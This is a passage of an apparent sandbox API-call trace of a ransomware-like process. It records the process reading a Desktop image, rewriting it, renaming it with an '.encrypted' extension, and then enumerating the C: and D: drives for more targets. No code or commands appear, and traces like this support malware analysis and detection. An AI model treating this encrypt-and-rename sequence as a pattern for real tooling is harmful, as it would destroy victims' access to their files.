HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", lpFilePart=0x0) returned 0x61 [0154.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6e0) returned 1 [0154.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\naofnftu-jyfyobo\\zl4d3ynrs.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.488] GetFileType (hFile=0x4d0) returned 0x1 [0154.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6dc) returned 1 [0154.489] GetFileType (hFile=0x4d0) returned 0x1 [0154.489] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee7e8 | out: lpFileSizeHigh=0x2ee7e8*=0x0) returned 0x94ca [0154.489] ReadFile (in: hFile=0x4d0, lpBuffer=0x238435c, nNumberOfBytesToRead=0x94ca, lpNumberOfBytesRead=0x2ee794, lpOverlapped=0x0 | out: lpBuffer=0x238435c*, lpNumberOfBytesRead=0x2ee794*=0x94ca, lpOverlapped=0x0) returned 1 [0154.490] CloseHandle (hObject=0x4d0) returned 1 [0154.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0154.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0154.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0154.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", nBufferLength=0x105, lpBuffer=0x2ee1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", lpFilePart=0x0) returned 0x61 [0154.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee6c8) returned 1 [0154.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\naofnftu-jyfyobo\\zl4d3ynrs.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.507] GetFileType (hFile=0x4d0) returned 0x1 [0154.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee6c4) returned 1 [0154.507] GetFileType (hFile=0x4d0) returned 0x1 [0154.507] WriteFile (in: hFile=0x4d0, lpBuffer=0x23ff91c*, nNumberOfBytesToWrite=0x94d0, lpNumberOfBytesWritten=0x2ee784, lpOverlapped=0x0 | out: lpBuffer=0x23ff91c*, lpNumberOfBytesWritten=0x2ee784*=0x94d0, lpOverlapped=0x0) returned 1 [0154.508] CloseHandle (hObject=0x4d0) returned 1 [0154.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg", lpFilePart=0x0) returned 0x61 [0154.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg.encrypted", nBufferLength=0x105, lpBuffer=0x2ee30c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg.encrypted", lpFilePart=0x0) returned 0x6b [0154.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee76c) returned 1 [0154.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\naofnftu-jyfyobo\\zl4d3ynrs.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2ee7e8 | out: lpFileInformation=0x2ee7e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd364ae10, ftCreationTime.dwHighDateTime=0x1d5df0c, ftLastAccessTime.dwLowDateTime=0xfc6cb00, ftLastAccessTime.dwHighDateTime=0x1d5e6f5, ftLastWriteTime.dwLowDateTime=0x430e5540, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x94d0)) returned 1 [0154.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee768) returned 1 [0154.518] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\naofnftu-jyfyobo\\zl4d3ynrs.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\NaofNftU-JyfYoBo\\Zl4D3YnRS.jpg.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\uzv83ywz1\\naofnftu-jyfyobo\\zl4d3ynrs.jpg.encrypted")) returned 1 [0154.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0154.519] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0154.519] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0154.520] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0154.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8bc) returned 1 [0154.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0154.524] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.524] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.524] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x94ee8b0 [0154.524] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0154.524] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0154.524] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0154.524] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x29eaaa00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x2a1f0840, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdfb2c860, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfb2c860, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0154.525] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0154.526] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0154.527] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0154.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0154.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0154.527] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.527] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0154.527] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x94ee8b0 [0154.527] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0154.527] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0154.527] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x29eaaa00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x2a1f0840, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdfb2c860, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfb2c860, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0154.528] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0154.529] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0154.529] 